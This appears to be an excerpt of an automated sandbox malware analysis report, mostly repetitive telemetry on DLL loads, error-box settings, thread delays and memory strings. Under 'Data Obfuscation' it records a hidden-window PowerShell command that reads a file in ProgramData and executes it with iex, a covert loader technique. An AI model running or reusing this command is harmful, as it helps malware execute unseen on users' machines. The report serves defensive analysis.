Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dllJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior

Data Obfuscation

barindex
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden "iex (gc ('C:\ProgramData\lgp\sjm') | out-string)"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden "iex (gc ('C:\ProgramData\lgp\sjm') | out-string)"Jump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3792Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6099Jump to behavior
Source: C:\Windows\System32\conhost.exeWindow / User API: threadDelayed 407Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7608Thread sleep time: -10145709240540247s >= -30000sJump to behavior
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: PING.EXE, 00000016.00000002.1853433270.00000205AB189000.00000004.00000020.00020000.00000000.sdmp, PING.EXE, 00000023.00000002.2236050694.00000214BE0B9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll7
Source: PING.EXE, 00000009.00000002.1500460706.00000235BB659000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllzzS6P
Source: PING.EXE, 0000000A.00000002.1543302411.00000227AAC58000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllPPS
Source: PING.EXE, 0000000C.00000002.1578652825.0000012923269000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll)
Source: PING.EXE, 00000017.00000002.1885479320.00000251C4408000.00000004.00000020.00020000.00000000.sdmp, PING.EXE, 0000001E.00000002.2067596366.0000022E68C49000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllK
Source: PING.EXE, 00000027.00000002.2372276778.00000262A8D59000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllb
Source: PING.EXE, 00000008.00000002.1464486163.00000235EDB28000.00000004.00000020.00020000.00000000.sdmp, PING.EXE, 0000000F.00000002.1610903268.0000026DAD8F8000.00000004.00000020.00020000.00000000.sdmp, PING.EXE, 00000011.00000002.1678126271.000001E4AE0C9000.00000004.00000020.00020000.00000000.sdmp, PING.EXE, 00000012.00000002.1717640333.000001EAF3738000.00000004.00000020.00020000.00000000.sdmp, PING.EXE, 00000014.00000002.1786068524.000001FB78FB9000.00000004.00000020.00020000.00000000.sdmp, PING.EXE, 00000015.00000002.1818444594.000002A8A64B8000.00000004.00000020.00020000.00000000.sdmp, PING.EXE, 0000001C.00000002.1987793639.000001E9B7FF7000.00000004.00000020.00020000.00000000.sdmp, PING.EXE, 0000001D.00000002.2032555785.0000021749447000.00000004.00000020.00020000.00000000.sdmp, PING.EXE, 0000001F.00000002.2099641684.000002439F187000.00000004.00000020.00020000.00000000.sdmp, PING.EXE, 00000020.00000002.2135476523.0000025ACE337000.00000004.00000020.00020000.00000000.sdmp, PING.EXE, 00000021.00000002.2168309979.000002567BFB7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: PING.EXE, 00000007.00000002.1432363759.000001B36D1F9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllxx
Source: PING.EXE, 00000010.00000002.1645958297.000002DB1F589000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllvv
Source: PING.EXE, 00000013.00000002.1750849094.00000131366F9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlldd
Source: PING.EXE, 0000001A.00000002.1920613024.0000024B5D2F9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll^^
Source: PING.EXE, 0000001B.00000002.1952789103.0000026FF5217000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllkk
